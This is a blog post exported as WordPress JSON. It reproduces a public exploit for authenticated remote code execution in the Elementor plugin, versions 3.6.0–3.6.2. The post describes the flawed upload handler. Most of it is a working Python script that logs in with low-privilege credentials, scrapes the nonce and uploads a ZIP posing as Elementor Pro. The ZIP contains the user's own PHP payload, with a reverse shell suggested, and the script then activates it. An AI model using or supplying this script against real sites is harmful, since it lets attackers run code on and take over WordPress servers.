# Exploit Title: WordPress Plugin Elementor 3.6.2 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 04\/16\/2022
\n# Exploit Author: AkuCyberSec (https:\/\/github.com\/AkuCyberSec)
\n# Vendor Homepage: https:\/\/elementor.com\/
\n# Software Link: https:\/\/wordpress.org\/plugins\/elementor\/advanced\/ (scroll down to select the version)
\n# Version: 3.6.0, 3.6.1, 3.62
\n# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)<\/p>\n
#!\/usr\/bin\/python
\nimport requests
\nimport re<\/p>\n
# WARNING: This exploit does NOT include the payload.
\n# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.<\/p>\n
# # # # # VULNERABILITY DESCRIPTION # # # # #
\n# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
\n# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
\n# The file that contains this vulnerability is elementor\/core\/app\/modules\/onboarding\/module.php
\n#
\n# At the end of this file you can find this code:
\n# add_action( ‘admin_init’, function() {
\n# if ( wp_doing_ajax() &&
\n# isset( $_POST[‘action’] ) &&
\n# isset( $_POST[‘_nonce’] ) &&
\n# wp_verify_nonce( $_POST[‘_nonce’], Ajax::NONCE_KEY )
\n# ) {
\n# $this->maybe_handle_ajax();
\n# }
\n# } );
\n#
\n# This code is triggered whenever ANY user account visits \/wp-admin
\n# In order to work we need the following 4 things:
\n# 1. The call must be an “ajax call” (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call \/wp-admin\/admin-ajax.php
\n# 2. The parameter “action” must be “elementor_upload_and_install_pro” (check out the function named maybe_handle_ajax() in the same file)
\n# 3. The parameter “_nonce” must be retrieved after login by inspecting the \/wp-admin page (this exploit does this in DoLogin function)
\n# 4. The parameter “fileToUpload” must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
\n#
\n# The file we upload must have the following structure:
\n# 1. It must be a ZIP file. You can name it as you want.
\n# 2. It must contain a folder called “elementor-pro”
\n# 3. This folder must contain a file named “elementor-pro.php”
\n# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
\n#
\n# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
\n# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
\n# In order to prevent this, I suggest you to use some variable to activate the payload.
\n# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
\n# if (!isset($_GET[‘activate’]))
\n# return;<\/p>\n
# Change the following 4 variables:
\npayloadFileName = ‘elementor-pro.zip’ # Change this with the path of the ZIP archive that contains your payload
\nbaseUrl = ‘http:\/\/192.168.56.103\/wordpress\/’ # Change this with the base url of the target
\nusername = ‘guest’ # Change this with the username you want to use to log in
\npassword = ‘test’ # Change this with the password you want to use to log in
\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #<\/p>\n
session = requests.Session()
\ncookies = { ‘wordpress_test_cookie’ : ‘WP+Cookie+check’ } # WordPress needs this to tell if browser can manage cookies<\/p>\n
def DoLogin(username, password):
\nglobal cookies
\nloginUrl = baseUrl + ‘wp-login.php’
\nadminUrl = baseUrl + ‘wp-admin\/’
\ndata = { ‘log’ : username, ‘pwd’ : password, ‘wp-submit’ : ‘Login’, ‘redirect_to’ : adminUrl, ‘testcookie’ : 1 }<\/p>\n
# search for: “ajax”:{“url”:”http:\\\/\\\/baseUrl\\\/wp-admin\\\/admin-ajax.php”,”nonce”:”4e8878bdba”}
\n# 4e8878bdba is just an example of nonce. It can be anything else.
\nregexp = re.compile(‘”ajax”:\\\\{“url”:”.+admin\\\\-ajax\\\\.php”,”nonce”:”(.+)”\\\\}’)
\nresponse = session.post(loginUrl, cookies=cookies, data=data)<\/p>\n
search = regexp.search(response.text)<\/p>\n
if not search:
\n# I’ve tested this on WordPress v. 5.9.3
\n# Fix the regexp if needed.
\nprint(‘Error – Invalid credentials?’)
\n#print(response.text)
\nelse:
\nreturn search.group(1)<\/p>\n
def UploadFile(fileName, nonce):
\nuploadUrl = baseUrl + ‘wp-admin\/admin-ajax.php’
\ndata = { ‘action’ : ‘elementor_upload_and_install_pro’, ‘_nonce’ : nonce }
\nfiles = { ‘fileToUpload’ : open(fileName, ‘rb’) }
\nregexp = re.compile(‘”elementorProInstalled”:true’) # search for: “elementorProInstalled”:true
\nresponse = session.post(uploadUrl, data=data, files=files)<\/p>\n
search = regexp.search(response.text)<\/p>\n
if not search:
\n# If Elemento Pro is already installed, the upload will fail.
\n# You can print the response to investigate further
\nprint (‘Error – Upload failed’)
\n# print (response.text)
\nreturn False
\nelse:
\nprint (‘Upload completed successfully!’)
\nreturn True<\/p>\n
# Define YOUR method to activate your payload (if needed)
\ndef ActivatePayload():
\npayloadUrl = baseUrl + ‘index.php?activate=1’
\nsession.get(payloadUrl)<\/p>\n
print(‘Trying to login…’)
\nnonce = DoLogin(username, password)
\nprint(‘Nonce found: ‘ + nonce)<\/p>\n
print(‘Uploading payload…’)
\nfileUploaded = UploadFile(payloadFileName, nonce)<\/p>\n
# Define YOUR method to activate your payload (if needed)
\nif fileUploaded:
\nprint (‘Activating payload…’)
\nActivatePayload()<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: WordPress Plugin Elementor 3.6.2 – Remote Code Execution (RCE) (Authenticated) # Date: 04\/16\/2022 # Exploit Author: AkuCyberSec (https:\/\/github.com\/AkuCyberSec) # Vendor Homepage: https:\/\/elementor.com\/ # Software Link: https:\/\/wordpress.org\/plugins\/elementor\/advanced\/ (scroll down to select the version) # Version: 3.6.0, 3.6.1, 3.62 # Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload) #!\/usr\/bin\/python …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23391","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23391"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23391\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}